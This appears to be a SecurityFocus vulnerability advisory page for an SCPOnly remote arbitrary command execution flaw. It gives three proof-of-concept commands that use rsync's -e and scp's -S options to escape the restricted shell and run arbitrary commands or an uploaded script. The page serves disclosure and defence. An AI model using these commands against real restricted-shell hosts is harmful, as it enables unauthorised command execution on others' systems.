SCPOnly Remote Arbitrary Command Execution Vulnerability

The following proof of concept examples are available:

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'

scp command.sh restricteduser@remotehost:/tmp/command.sh

ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'


 

Privacy Statement
Copyright 2010, SecurityFocus